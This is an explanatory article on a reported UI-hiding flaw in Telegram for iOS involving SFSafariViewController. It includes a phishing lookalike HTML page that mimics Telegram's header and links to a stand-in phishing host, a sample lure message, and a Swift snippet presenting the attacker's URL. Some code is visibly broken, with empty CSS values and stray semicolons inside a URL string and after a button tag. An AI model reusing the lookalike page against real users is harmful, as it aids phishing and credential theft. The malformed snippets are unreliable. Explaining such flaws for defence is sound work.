---

Introduction

In June 2023, a security vulnerability labeled CVE-2023-34658 was discovered in the popular messaging app Telegram, specifically version 9.6.3 on iOS. This vulnerability allows attackers to intentionally hide critical information from the user interface (UI) by leveraging a legitimate iOS component called SFSafariViewController. Because Telegram is widely used for private communications, this weakness could be exploited for a variety of social engineering attacks. In this article, we’ll break down the issue, show sample code, and explain its impact in simple terms.

What Is SFSafariViewController?

SFSafariViewController is a built-in iOS component that allows apps to display web content within the app itself, without opening the full Safari browser. Telegram uses it to let users open external links safely without ever leaving the app.

What’s the Vulnerability?

Telegram did not properly handle overlapping of SFSafariViewController with its main app UI. A malicious actor could craft a situation where they deliberately show a Safari web page that covers, hides, or misleads UI elements with important security or privacy info—like sender identity, warning messages, or confirmations—tricking users into thinking they’re interacting with the Telegram app, when they’re actually seeing a controlled browser window.

Impact:

Suppose an attacker sends a Telegram message like this

Hey, check out this cool sticker pack! https://evil-site.com/fake-stickers

Once opened in Telegram, the app will launch SFSafariViewController with that URL.

The malicious web page served by the attacker might look like this

<!DOCTYPE html>
<html>
<head>
  <title>Telegram Offer</title>
  <style>
    body {
      background: #222e35;
      color: #eaeaea;
      font-family: 'San Francisco', Arial, sans-serif;
      margin: ;
      padding: ;
    }
    .fake-header {
      background: #2d3941;
      height: 56px;
      display: flex;
      align-items: center;
      padding-left: 15px;
      font-size: 18px;
      font-weight: bold;
    }
    .content {
      text-align: center;
      margin-top: 50px;
    }
    .button {
      margin-top: 30px;
      background: #32b5f6;
      color: #fff;
      border: none;
      padding: 15px 40px;
      border-radius: 8px;
      font-size: 20px;
      cursor: pointer;
    }
  </style>
</head>
<body>
  <div class="fake-header">Telegram</div>
  <div class="content">
    <h1>Unlock Exclusive Stickers</h1>
    <button class="button" onclick="window.location='https://evil-site.com/phishing'">;
      Add Stickers
    </button>
  </div>
</body>
</html>

Key point:
The fake header and colors mimic Telegram, creating the illusion this is a special, in-app dialog, hiding the real Telegram UI underneath.

Screenshot for concept (not actual image)

| Telegram              [X]     |
|--------------------------------
| Unlock Exclusive Stickers      |
|   [  Add Stickers       ]      |

The genuine Telegram title, back button, and any warnings are hidden from the user behind the browser pane.

Why Is This a Problem?

Normally, users rely on Telegram’s own interface to verify identity, spot official warnings, or undo risky actions. But by shrouding the UI with a lookalike web page *inside* Telegram (thanks to SFSafariViewController), attackers can lure users into entering passwords, confirming fake transactions, or visiting more dangerous phishing sites.

let url = URL(string: "https://evil-site.com/fake-page";)!
let safariVC = SFSafariViewController(url: url)
present(safariVC, animated: true, completion: nil)

Telegram automatically opens SFSafariViewController on user tap without extra verification, creating the perfect cover for an attacker.

Mitigation and Fix

- Telegram fixed this in later versions by restricting what can be loaded, improving warning overlays, or showing browser labels more clearly.

Users should update Telegram to the latest version.

- Always check the address bar when SFSafariViewController opens—look for the actual URL to avoid phishing attempts.

References

- CVE-2023-34658 MITRE Advisory
- Telegram iOS Changelog
- SFSafariViewController Documentation

Conclusion

CVE-2023-34658 reminds us that even trusted apps can have hidden UI traps when integrating web content. While this attack depends on user interaction, it’s effective enough to fool many people because it leverages visual mimicry and familiar layouts. Stay cautious, keep your apps updated, and triple-check links before trusting anything—even within / trusted apps like Telegram.


*For security researchers: Always report suspicious or exploitable UI behaviors to app developers for fast remediation.*

Timeline

Published on: 06/29/2023 17:15:00 UTC
Last modified on: 07/07/2023 17:11:00 UTC